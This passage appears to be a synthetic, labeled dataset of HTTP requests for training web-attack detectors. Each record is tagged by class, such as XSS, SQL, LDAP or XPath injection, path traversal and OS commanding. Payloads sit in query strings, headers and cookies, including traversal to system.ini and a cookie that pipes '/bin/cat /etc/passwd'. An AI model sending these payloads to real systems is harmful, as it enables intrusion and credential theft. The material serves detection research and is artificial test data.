If-Range: *
Max-Forwards: 104
MIME-Version: 0.4
Pragma: cn=aLwhuimn
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: NTLM aGN6aTVpd3RycnFzdGJvaHN0MnVqc2xpZ25hYWVkZm9saw==
Range: 70-
Referer: /7b5rbds/eeeBsj/w0ulqaoo/lrnzna/ea8eLll9.jsp
TE: chunked
Trailer: Date
User-Agent: Mozilla/2.6 (Machintosh; U; Mac OS X 0.8; 1t-wa; rv:8.6.2) Gecko/53136667
UA-CPU: x86
UA-Disp: 224,424,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1501x189
Via: p3nw/6.4 239.198.77.138, FTP/4.4 www.adnaao.shtml, HTTP/0.8 210.137.141.112:893
Transfer-Encoding: gzip
Upgrade: 8sjta/1.7, OaiEm/9.0
Warning: 552 www.5qeog.tiff "0tt4tuzwrsgn" 
X-Forwarded-For: 194.144.61.158
X-Serial-Number: 388289600968011
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44103
Start - Id: 47015
class: XSS
GET /ea/dNxUns7U26/tt@9XB/ssohzhJReoazdohu/ttSyrth/xRent/dk7kvlNwB.tiff?elrehe2e9vo=onthtporoslocationaf%40unTe%7C&4stbgu=6a%2Fs&AunionFlinkP=5&qsi0lso=kEbaehol5gi&pE.Z@eSr@Z=3047942&AAJLG9cZIO=%3Cbgsound+src++%3D++%22+++++javascript%3A+%5Balert%28%27otaes%27%29%3B%5D%22++%3E HTTP/1.0
Host: 36.249.170.88:80
Connection: hrshaoed
Accept: */*;q=0.5
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 18.81.58.217
Cookie: qds0w=iuweavlarhfb
Cookie2: $Version="07"
Date: Wed, 13 Jan 10 10:31:16 GMT
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: 100-continue
From: Desiah@eghc.be
If-Modified-Since: Fri, 09 Apr 10 12:49:02 GMT
If-Unmodified-Since: Tue, 10 Jul 07 07:07:46 CET
If-Match: *
If-None-Match: "8PpG3FqQ9ZuEzoYwB_"
If-Range: "tAsGUpn2Oqq7UuroOq"
Max-Forwards: 9
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWV0YmV0Mm9iQW9DOGd5TmV4U3R4bXRZNnNhbGRlaG9Wdmk=
Authorization: Digest username="unbxdine"
Range: 5-22964
Referer: /rgide.avi
TE: trailers
Trailer: Host
User-Agent: Mozilla/2.1 (compatible; MSIE 6.1; Win98; 2dfds; Dr0rehe3e)
UA-CPU: Sparc
UA-Disp: 128,634,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7231x6416
Via: FTP/1.0 www.deximPfs.shtml
Transfer-Encoding: aoav
Upgrade: me2u/0.5, c1ltE/4.5, nttiep/4.6, nsse/9.4, npleer/2.6
Warning: 523 www.sioteo.shtml:61 "e4ipraamice7" 
X-Forwarded-For: 212.120.206.157
X-Serial-Number: 239527167
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47015
Start - Id: 42030
class: SqlInjection
GET /eWMS_-v3k1Pz0dz/e45b1oOSQ04_0s/nfOr2i8tmq3neoIeotlr/uPrY@4qvuwLck5YGU/S9Wa24-B4Kb/f7NpVgkexFLReCgDrJ/abmhgp/dM_7nncli4pvbscriptftp.js?lnaanses2=rwPiayatsfmw1&deaMbnui3lzLltO=%27++OR+%27bcrNpkx4ch%27+BETWEEN+++%27R%27++AND+++%27T&toha=ooGlmuS+ofelldn&e1tsienMC=Jnlne%3Eot%40earn&mum=30342&-0UoL-=uttutnrCexigroup+byeea HTTP/1.1
Host: 76.122.223.224
Connection: lowshH7e
Accept: */*
Accept-Charset: gb2312
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 144.52.64.113
Cookie: VESOaBBvfJg=rS.0KXr;RFITvgahYMBZ=~g9tr A
Cookie2: $Version="324"
Date: Thu, 29 Sep 05 07:29:53 UTC
ETag: W/"lA1u1EyP2heJ6CUKvO"
Expect: 100-continue
From: eliqs@octere.st
If-Modified-Since: Sat, 28 Nov 09 09:35:59 GMT
If-Unmodified-Since: Wed, 02 Apr 08 14:05:18 UTC
If-Match: "Sgs6zcXjPd-SfFE_9LB"
If-None-Match: *
If-Range: Thu, 26 Feb 04 22:41:06 UTC
Max-Forwards: 336
MIME-Version: 9.3
Pragma: cdoq='ulz90eh'
Proxy-Authorization: Basic ZWdvZTpuaGY0aG4=
Authorization: cces otcyhxtr=dmut
Range: 4936-0,-6636
Referer: /74ds/Ntoe/nowuAeel/9niferfs/nhDnTd.fgf
TE: trailers
Trailer: Date
User-Agent: otCvooC (i3X_vqS; pUCZz5r7U; efMnFjntRx)
UA-CPU: 68000
UA-Disp: 7502,392,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 422x9399
Via: 6.4 254.237.247.163
Transfer-Encoding: deflate
Upgrade: tomgi/1.4, rQn9a/6.1, etcrc/1.8
Warning: 769 10.15.201.53 "Godo5tfeue" "Sat, 19 Aug 06 13:20:24 UTC"
X-Forwarded-For: 128.48.152.130
X-Serial-Number: 27908
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42030
Start - Id: 44934
class: PathTransversal
GET /aacEaxEiadsjaas4tn/sPBaFgHISXnIj_/nivgz61zjt/helniTlrut5ortD/Emi/R0eret/sr@h@Z9GznXjNDU-b.bin?QNwkltliSfans=qnPec1hJe8T8&Aispnu=9496782&nt=%3Fautoexecha&emyzrhodpurnL=5837&ssEyafvatvi=50929&sh9hpEo=phpts7b%3B%27tid%3D&moj9ozkq=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500&59GCe=tsdsnpe&tnanttse=768491&iroi=RltmoKe1btazey&fedlSachmAhpZ=4&-174D=daA+%3Ds%40wallesl%240d&tpaanxawc0tod=q0NJfZmq%403l&R94TlikeBadminrWCbgsound=yscda4ljo&IWU_NZSgO2d=t5A4h5eelbp HTTP/1.1
Host: www.eihiet.it:1
Connection: dero
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.8
Cache-Control: Kcarcep=raaLo5t
Client-ip: 119.33.88.93
Cookie: co=ecus;Y3httpsA=tXhtopcr\stdin3;nmup=eafe
Cookie2: $Version="19"
Date: Thu, 08 Mar 07 20:36:36 CET
ETag: W/"FTabip4q-bvxfAK_"
Expect: laocgTl
From: soalt1r@dvplbabmDs.be
If-Modified-Since: Sat, 21 Oct 06 08:43:42 UTC
If-Unmodified-Since: Sat, 27 Jun 09 17:14:53 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 10 May 09 10:14:13 UTC
Max-Forwards: 3
MIME-Version: 8.4
Pragma: De=scotyld
Proxy-Authorization: Digest response="98F2FadAed0C8DFfeDEa1A54Dbbba32e"
Authorization: dsaymv n8rorao=tsrtn
Range: 965978-,-986,-07275
Referer: /x8Aga5S/uoouge.jsp
TE: trailers
Trailer: Cache-Control
User-Agent: lwomar
UA-CPU: StrongARM
UA-Disp: 3440,7675,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0076x7912
Via: 3.3 www.ushn.png:84, 5.7 www.ctolb.htm, 3.3 www.ipzciEe.html
Transfer-Encoding: compress
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 950 137.235.245.175 "hbxglaknHngrreueDa" "Wed, 14 Feb 07 12:55:59 GMT"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44934
Start - Id: 41553
class: SqlInjection
GET /eGH10NOGrV-/eIf04wIJ7.php4?..FFT7w04=rf+&_NFmJhttpinsertAz.C1=46558115&csit9roeqt=%27+++OR++%27rrteohMe1iu%27+++%3D+%27Ln%27%2B%27ietfz%27&Aps7sr=5of&exeet1c=ytbtIRlO&8cmd1Gqa=22669&c1RTyscriptGBxs=1a+and&AtfiOes=4&mfdsictnalohts=nulld&sTrkiLbsuC=l_HdLJ&4H.dQj=9tw0sf&PObgsoundEXtmpvsbMS=273270&tao=mTpq6&rectdsetam=sBr&ac7hnostof=- HTTP/1.1
Host: www.ttei.uk:80
Connection: keep-alive
Accept: application/*;q=0.8, text/*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.6, gzip;q=0.6, gzip, compress;q=0.1, compress;q=0.8
Accept-Language: *
Cache-Control: min-fresh=8551
Cookie: atinap=d9eei;ci4i2wIhaIne=e?id
Cookie2: $Version="62"
Date: Fri, 19 Nov 04 15:35:23 UTC
Expect: vnri
From: wjdalk@Ofzi.biz
If-Modified-Since: Sat, 18 Dec 04 03:25:14 CET
If-Match: "X4cCdbgr_LvZvtW0RM"
If-None-Match: *
If-Range: Thu, 15 Apr 04 14:50:44 CET
Max-Forwards: 160
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWVpdXM4bnZlckFpYW5tMXRoY3JicjJwZEd0TG91bnlBV2F4dXM=
Authorization: Digest opaque="eiAqly"
Referer: http://www.l7uo.org/rftn4/hiaeaod/od6ti2er/tn3dtym.gz
TE: gzip,deflate
Trailer: If-None-Match
User-Agent: aenszl24f3/1.2.3.4.6
Via: owe9n/7.7 www.iaeatwci.htm
Transfer-Encoding: compress
Warning: 924 www.tl2tn2r.tiff:1735 "i0edcChnth5mercmaxie" "Sat, 07 Feb 09 03:06:52 CET"

null

End - Id: 41553
Start - Id: 35161
class: SqlInjection
PUT /ih9amOtknqt4uhLtf7/eNtUqWY/oFea9yItp2iekdlde/n2.html? HTTP/1.0
Content-Length: 192
Content-Language: aeogan
Content-Encoding: compress
Content-Location: http://okde.uk/jteNco/etisbe.conf
Content-MD5: aHNhOG9hYXNpc2lvZXRweQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 20 Jun 04 20:30:38 UTC
Last-Modified: Fri, 29 Oct 04 21:14:49 CET
Host: 61.40.255.192
Connection: close
Accept: audio/x-wav, application/*
Accept-Charset: iso-8859-9, utf-7, windows-1258;q=0.2
Accept-Encoding: identity;q=0.0, deflate;q=0.1, identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 49.178.8.248
Cookie: nteu=44391075;natNitqg=nmm;up7t=2178091712
Date: Sun, 11 Jul 04 19:01:28 GMT
If-Modified-Since: Mon, 21 Aug 06 07:09:35 CET
If-Unmodified-Since: Tue, 21 Jul 09 21:32:59 GMT
If-Match: "NUg_u81tc@oOp2-6TtTn"
If-None-Match: "jzHpNuQ2VbUKjXJ"
Max-Forwards: 571
Pragma: wgPh='2'
Authorization: NTLM dG9sY21vbm5SYXZ0cmtybjBmb2hqZXZzdG5SZEgwamVjZQ==
Referer: http://ai1nmont.biz/s0bf.swf
User-Agent: ceSoHn71ro (aVfuYT; 62PsDX; hT93gapFFW; 6NYd35O7A; aYIXN1TYG)
UA-OS: Linux
Via: 5.2 www.gimvte.shtml:40474, 7.9 217.9.21.157
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

exec9cmdjK=edo1&1wylroNaOiv9rI=erm&eltc=yb2y&01lnatep7Rdloi=sIt7z@o_6bLK&wWSKk-V9=41600632&lstchuudisi=\$lbehnhdoe2o$t&oosg=t&b.MiFaEO5RDJ=   OR   2 >   1&laswatIi=qLd9ef]inlinkhm0

End - Id: 35161
Start - Id: 38030
class: LdapInjection
GET /iDO9/ocRhsreSjudniro2ico/tY_81ZRgbos_711gTW/diITn9Asystem.php3?qHsqprocessing-instruction=nIasoe0a&v1erCuuih=lmt7NPhf&tdevalQN6KQLONR=tee%3Farewinnt&snden=tCseti%40t8enetc&GxwAI=tK.&leAaugo0i=640596706&xaOh7stelfui=503&lldPEdXto=ten1Dom7vfton&puoolsOMtsz0n=53&passthruxS5Jprocessing-instructionCidAX=8&copasswdsvbscriptGiframeA=%29++++%28%7C+%28displayName%3Dhad*%29%28name+%3D+++had*+++%29%28++++mail%3Dhad*+%29&nn8u=6t&4rsr=n%5Cruudycostyleunionfpasswdas%29systemmetali&dbrentn0ileye=9JD4jRWBV&clribeoIun1x=6asrowih2 HTTP/1.1
Host: www.rTwngo.com
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.0, us-ascii, utf-8, x-mac-korean;q=0.0
Accept-Encoding: 
Accept-Language: sagn-koo5uYer;q=0.9, loHrooey-rTe;q=0.3, dltt63pt-jm;q=0.7, f8dsorE-ff9
Cache-Control: max-age=8
Client-ip: 252.123.213.7
Cookie: eghs1=72428159
Cookie2: $Version="45"
Date: Sat, 17 Jan 04 18:39:57 CET
ETag: W/"hJ9vUmp.@v3Mr.ewG7Hg"
Expect: 100-continue
From: aFbh@rtrss.de
If-Modified-Since: Wed, 17 Sep 08 17:37:29 GMT
If-Unmodified-Since: Fri, 20 Jan 06 22:31:58 CET
If-Match: "GQjv96XyKUuLZ50fbV"
If-None-Match: *
If-Range: Thu, 18 Feb 10 03:25:18 GMT
Max-Forwards: 4080
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: ns6mf r0kt=b8art
Authorization: Basic Y25uaDpsYThpc3o=
Range: 67-6,809162-
Referer: http://tiinb.gov/qsls/sl28.bin
TE: trailers,chunked;q=0.6,deflate
Trailer: Cache-Control
User-Agent: e4GqVv http://www.tIkeheoo.cz
UA-CPU: x86
UA-Disp: 2707,126,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 427x816
Via: 4.0 www.sh3seq.gif, 3.0 www.ageeaWiO.html, FTP/4.6 52.36.212.119
Transfer-Encoding: deflate
Upgrade: e6ic/2.4, akt/3.2
Warning: 508 192.205.119.35 "nt4dwdbahmiorotHpmts" "Tue, 19 Apr 05 13:54:10 CET"
X-Forwarded-For: 59.200.146.205
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38030
Start - Id: 37661
class: LdapInjection
POST /Qxml8Oz@qPQo4T/o9hyno6Enf/d.Q18HFhlmpuVINiLV/6dwOmsnDh/wloOyisysChthrtle/dibmmrminn/okbodoSdr/bGxWcBcNPWSLse/htpassgvXZ-PMeN.jpeg? HTTP/1.1
Content-Length: 361
Content-Language: 0l8hi
Content-Encoding: gzip
Content-Location: /aAmepr/seevidd9/rpo6.php3
Content-MD5: ZDJlYzFtbXRTTHFyaXdUeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Mar 04 06:33:46 GMT
Last-Modified: Mon, 26 Apr 10 09:18:50 UTC
Host: 192.11.197.127
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic, euc-tw;q=0.6, windows-1253
Accept-Encoding: deflate, identity, identity, deflate
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 88.224.210.21
Cookie: fD9dN=rne;fvu.mo8W=Emnwget;whAgwYJ=uo;OeEEjt=+g
Cookie2: $Version="657"
Date: Sun, 01 Jul 07 08:51:48 UTC
ETag: "L1wKH0qc0h5OgNanY"
Expect: 100-continue
From: TttDoe@rczep.it
If-Modified-Since: Fri, 12 Sep 08 16:38:18 GMT
If-Unmodified-Since: Sun, 18 Jan 04 05:22:18 GMT
If-Match: "5qVSlFtCPr@W6bgJit"
If-None-Match: "d.DGrsWliM4f-x9NR"
If-Range: *
Max-Forwards: 1810
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM aUVqY3J4cm12bjludHppZWhyaXNtc2FvdW9xcnNlYXNO
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: http://www.uhrkacn.net/cept/reiae.swf
TE: deflate;q=0.0
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.3 (Windows; U; Win 9x 7.1; pj-pO; rv:6.7.0) Gecko/66923035
UA-CPU: StrongARM
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 940x1719
Via: 1.2 www.sgqnnra.js
Transfer-Encoding: Edla0w; ealhgc=lFheip3
Upgrade: pemoEi/4.0
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 62.169.63.215
X-Serial-Number: 0737126851
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

r9a1teaft4oeYe=ax9? $ceigNndon&wierrhoHphHai=reurt]copy Nr&cNyta7=4228&ifbmcaEcel=52&dEiyyeos=ettnersrNo&nlhe=]tisupdateonnyNkreplacepasswd&2rHttboie=oeedas&4njtoapau=9o&PxL8_in=snute00R87c&jaysuCbsbndw=erdi&vhaLe=autoexecri&oeegndY3ls=")(targetfilter=(o=NetscapeRoot))&aaiOneeimheama=z-XFzGofpK&ehvnncyiIi=0068848214&tlksaney1e0buh=5758

End - Id: 37661
Start - Id: 46364
class: PathTransversal
GET /lRYuE/rlreHelEtej/bee-fy/iJ5bG/pZeKH2%uxWfobject6q.jpeg?or=7723194&UunteUarh=46481586&latacogpRaath=58490&rs0ntesoh=RBqe3ira%3Decee&hadanra=ahgSxwLZ-sf&sxiipdgLrdsre=afeeoets&lEov=0&objectnsystemfovbscriptZUa6N=3f0HOf6&iii6sdCsaeye=%2F%2C%2C%2C%2FxAs5%2FEn%2Fpasswd&q50gU2tJ=411&eeN=exechspassthrui+aeeitcorusrbide HTTP/1.1
Host: 174.227.42.151:80
Connection: aaet
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.0, compress;q=0.4
Accept-Language: rElrigt-eeuwctha;q=0.0
Cache-Control: Tuoed4i='dla'
Client-ip: 214.183.248.166
Cookie: g2=dwartbnaekls;7Sh64WF8rd=697577689
Cookie2: $Version="64"
Date: Mon, 04 Jan 10 23:25:42 CET
ETag: W/"O6CVj03f@WFfucmV6x"
Expect: aitsn
From: cewts@1fgr.fr
If-Modified-Since: Thu, 19 Jun 08 14:25:17 GMT
If-Unmodified-Since: Wed, 06 Aug 08 11:44:01 UTC
If-Match: "c1IzCSR.5lgREbk.Y"
If-None-Match: *
If-Range: "Qff_ster.HOlJM-"
Max-Forwards: 873
MIME-Version: 1.9
Pragma: blaybao=o3ucr
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: ggeO ihqzp=etqEih
Range: 405245-17797
Referer: /iaiEta/ottato/t41sci/rds3h7w/aran7pd.zip
TE: trailers,deflate
Trailer: Via
User-Agent: oseeiinp (t0K1FaZ; heRh-HUs1Q; thJ2eBdwNT; a@Bjsf; hb_0P0)
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 648x2225
Via: FTP/5.0 www.ekEdy.png, HTTP/1.8 www.Kawrss.css, 3.5 www.nrdeC9n.shtml
Transfer-Encoding: deflate
Upgrade: tarad/0.1, sawaj/0.5, aeLes/2.3
Warning: 298 47.169.61.113 "pr6idci4mnm8" "Fri, 15 May 09 02:27:43 UTC"
X-Forwarded-For: 241.79.66.180
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46364
Start - Id: 45966
class: PathTransversal
GET /kpDeultmlw1pl/iLJQkGCWIoMqXTV/aiwjbestrpdo/lyesnodvi/V@5tmp/iSNSInsnsoeem.css?uetmeufin8Ef0=779903&eieo=inlikeautoexecr&eOeuPw6axlteLt=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&nlsrhopiurr=uaiy&eROyN=lojhv&-xdFkl=%24ID&a4dgt7yaeh1dv=4538128018&frheaieg=8315201 HTTP/1.1
Host: www.nerwn2E.fr:829
Connection: close
Accept: */*
Accept-Charset: iso-8859-15, euc-cn, x-mac-roman;q=0.8, windows-1257
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: aocyDvss=eph
Client-ip: 84.6.25.215
Cookie: m@aPAr=ki1nnOyst;gvxVY.drop=70;lhiteae6xsnj=13
Cookie2: $Version="43"
Date: Sun, 06 Sep 09 10:13:37 CET
ETag: W/"Tw.50e1c0c9D2NOl@2Y"
Expect: 100-continue
From: giwa@ncetc3ams.net
If-Modified-Since: Tue, 08 Sep 09 20:30:02 CET
If-Unmodified-Since: Tue, 19 Jul 05 04:56:31 GMT
If-Match: "wrzQ1MO@qhdCVQ5H8gd"
If-None-Match: "Rl8DL2b6u4C3pnSOj"
If-Range: Tue, 27 May 08 14:11:10 GMT
Max-Forwards: 8024
Pragma: no-cache
Authorization: egeteo TokaeEce=c8yd
Referer: http://eBrrEa.biz/asdlt/aa3k.swf
User-Agent: ys6un (eeRTfE4; 4188fbg@9)
UA-CPU: x86
UA-OS: Win98
UA-Color: color16
UA-Pixels: 297x264
Via: 1.8 www.emuerwfo.tiff:788, FTP/1.0 170.207.50.151
Transfer-Encoding: identity
Upgrade: gOraok/6.8, woRu/7.2, saOiE/3.6, nltr/3.7
----: ------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 45966
Start - Id: 38874
class: LdapInjection
GET /hCrl/nZOmeZh/mTe9mIneoe7.exe?hRtt9v=%29+++%28+++%7C+++%28displayName%3Dhad*%29++++%28name+%3D+had*+++%29%28+mail%3Dhad*+%29&.yKW9COjnEy=m HTTP/1.1
Host: www.ebIoner2h.it
Connection: close
Accept: application/x-tar;q=0.2, image/png;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: mgrxneol-t, tp9lrnea-s6iu
Cache-Control: max-stale
Client-ip: 9.41.106.201
Cookie: mtrluintrA=63;i4Arn0Arbeteot=uxnegfid;tiepu1o=oem;nnc9zoelf=2610144;pd=30928
Cookie2: $Version="37"
Date: Tue, 20 Jun 06 19:11:29 GMT
ETag: W/"b76tKsiEpdhYw3@"
Expect: aetlNI
From: w08rh3@rpehekeyi.com
If-Modified-Since: Thu, 23 Sep 04 14:05:10 CET
If-Unmodified-Since: Sun, 21 Dec 08 15:58:01 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1250
MIME-Version: 2.9
Pragma: a=pybortsb
Proxy-Authorization: Digest nc=7636d743
Authorization: Basic ZWVmaXdhOnFjYXkzYQ==
Range: 15934-,799-8058,-81465
Referer: /6ekofbit/ghol9ib/kioe9/rbhErt/omaqsv0.ace
TE: trailers
Trailer: Via
User-Agent: ostmavy (awRCNrbj; siMwTPx; crcivoQRtu; oFaNRbTCd; li6oG_n3lb)
UA-CPU: PowerPC
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 279x383
Via: HTTP/4.8 255.165.232.163
Transfer-Encoding: gzip
Upgrade: ie8dt4/3.8, nnn/9.0
Warning: 605 205.123.17.49:63776 "cb6tsipI2WEtibtnMi" "Mon, 26 Sep 05 17:29:00 CET"
X-Forwarded-For: 187.158.7.224
X-Serial-Number: 9521103915785136495
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38874
Start - Id: 48805
class: XPathInjection
GET /MAuRp7KY4yCxke/es5x3ski/pjI_D_8YM_kyBnXH/tq4b7YK30Lrc0v/reu4pik1o/eY-nmn9XPoOW2-/rDZryZHXv/O3UG/ebA7/2QHmIbJN.php?Rt=097621353&csl9Tpggn8yco=eM&g9hTwn=%3CestTHutmeL%5Bsnrsi&DeapeT=r&tshnosnt3cd=Es%3Etom&7J_J2aZhsystem.p=844230&ot=35qaq.t&shcemuln6ep=aqemb%27+or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or++++%27nEE%27+%3D+%27&hCznrvNhe=rmnr&iaR7elseiaoS=480898495&NJa-ps=nd&dm2ouv=245044&eeimfgib=m2trtqel&lMsdate=pW0%40x3 HTTP/1.0
Host: www.frIKTahur.uk
Connection: EfvnAp
Accept: video/mpeg, audio/*;q=0.8, application/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, gzip, deflate, deflate;q=0.5, deflate
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 215.6.165.172
Cookie: aTs0vrheayngs=edOlLW
Cookie2: $Version="7"
Date: Sat, 15 Apr 06 15:35:39 UTC
ETag: W/".EXNWZ0xRZ8f9BV"
Expect: x2larteo
From: 2geofch9@4eke.org
If-Modified-Since: Wed, 31 Mar 10 04:19:28 GMT
If-Unmodified-Since: Mon, 03 May 10 12:59:32 GMT
If-Match: "46Wnu8zuFB0Kz6jfl"
If-None-Match: *
If-Range: *
Max-Forwards: 524
MIME-Version: 5.2
Pragma: lorn1='aeta5a'
Proxy-Authorization: Digest response="08bA7c67a569BFcBED9f6CeCC1e6B5Cb"
Authorization: Basic bVAzNmxPOmxsaWVz
Range: -77394
Referer: http://www.ai8Rsan.it/ecqzz/edek/etgt/aYIt6/ooanbtot.js
TE: trailers,deflate;q=0.5
Trailer: If-Match
User-Agent: pEegilse5l/0.6.8.1.5
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 807x856
Via: HTTP/2.0 www.am452.js, FTP/4.4 www.arna.css, 0.3 www.snIea7W.png
Transfer-Encoding: compress
Upgrade: 71emX/6.2, hao/6.3, scEf4/7.0
Warning: 989 42.33.152.171 "ej9c" 
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 9894674694471428
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48805
Start - Id: 48319
class: XPathInjection
GET /takb5us/e9YpNtmpF@pBoI/nciscbnerc/caYpZsfIUBL3Wtm/sBS6iQ613nm6SF_y/8Er/7lfiIv/eJm8DxuR@E/6CyidR8Xall9rN2K.png?deyhacpntlltg=s%7Es3lib2stdinohofCp&icdag57h=S&AlheI1kutnuis4M=16422&aUTABprocessing-instructionG=e%24gqtwhtpassq%28f2%27%7E HTTP/1.1
Host: 29.252.122.56:80
Connection: dlist
Accept: application/x-tar, video/mpeg;q=0.6
Accept-Charset: iso-8859-15
Accept-Encoding: wahnem'     or    6   <  count(path/child::*)   or  'aehRar'   ='
Accept-Language: nereo-ge;q=0.0, ohxbUY-p;q=0.9, st-e, bsmsd-a, ytcBndh-A;q=0.5
Cache-Control: max-stale
Client-ip: 90.58.128.202
Cookie: 5gthm5otAtrusy7=nrnda6iog5eAn3p;xstnMcir1u=3sbaa7stcar2ci;lsrarai6cupas=nRlo;X-vPhtpassvHhwynz=Sjh;ess=5629128
Cookie2: $Version="3"
Date: Fri, 14 Oct 05 11:02:17 UTC
ETag: W/"6UUI1@JW63a.jma2f1"
Expect: preieae1=rrnnt7r
From: tlgvoTUc@weaHAo.be
If-Modified-Since: Sun, 27 Jul 08 10:17:29 CET
If-Unmodified-Since: Fri, 16 Jun 06 23:37:15 GMT
If-Match: "5@lit5Gf6gB8ypW"
If-None-Match: *
If-Range: "od@Rp-TXux0Nbrg"
Max-Forwards: 025
MIME-Version: 6.0
Pragma: t='ety'
Proxy-Authorization: qtfde 1Tic=etNhghne
Authorization: ro2Xo ulta=pOrntd6
Range: 25-46045
Referer: http://www.nHhieuts.uk/Sebcn5.asmx
TE: trailers,chunked;q=0.9
Trailer: If-Modified-Since
User-Agent: krs6qlp
UA-Disp: 296,6544,16
UA-Color: color8
UA-Pixels: 433x249
Via: 0.5 www.onileto.jpg, pmwshi/7.2 21.94.135.100:329, 6.9 www.rdtwirs.html
Transfer-Encoding: nroNns; twirb=derws
Upgrade: ggwu/8.7, eaee/3.4, wiazc/3.1, tznuol/7.6, gfi/8.6
Warning: 545 www.lmrboeu.jpeg "maAlRieci" "Mon, 07 Mar 05 16:38:52 UTC"
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48319
Start - Id: 42959
class: OsCommanding
GET /drLe8fdteCesrepne/9Fbetween8P/NWachoteregstesClws/a8CSq3.cfm?gieaadalbit5=m%5DdsuG&D2d8@A_=eces&cessncecps2Aego=o6Zu_ HTTP/1.0
Host: www.tghe4n.fr
Connection: leeHt
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: 3t-uEinrA, cGorrmh-zyz, eetdsi-2s
Cache-Control: no-cache
Client-ip: 165.228.47.160
Cookie: iemsETwre=sete n?=fslzz3ey ;oijnHegiemea=556423351;reAoyfagec=0256312801;bzsymo=|/bin/cat   /etc/passwd%00.html
Cookie2: $Version="2"
Date: Wed, 15 Apr 09 22:26:21 CET
ETag: "_hbVQae_.yrFl_x38Hy"
Expect: 100-continue
From: eefh@5eodhRlM.cz
If-Modified-Since: Thu, 19 Jul 07 18:57:44 UTC
If-Unmodified-Since: Tue, 27 Dec 05 19:25:11 UTC
If-Match: ".UuedeS91FrdnyO"
If-None-Match: "orTyn2kKpeCXorxo02I"
If-Range: *
Max-Forwards: 0
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM aGxhbm90c2ZtbElhdHNlb2RJbnNIbnNXYTBuc3lramVxbmN1dWlydHIx
Authorization: Basic ZWlmcmU0aW46ZEduYW1lZA==
Range: 897591-3673
Referer: /nw3d/stne/ixnsnonb/4yhr.gif
TE: chunked;q=0.8,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.2 (X11; U; Unix 1.0; on-2r; rv:9.0.9) Gecko/51217639
UA-Disp: 0867,9888,32
UA-OS: FreeBSD
UA-Color: color8
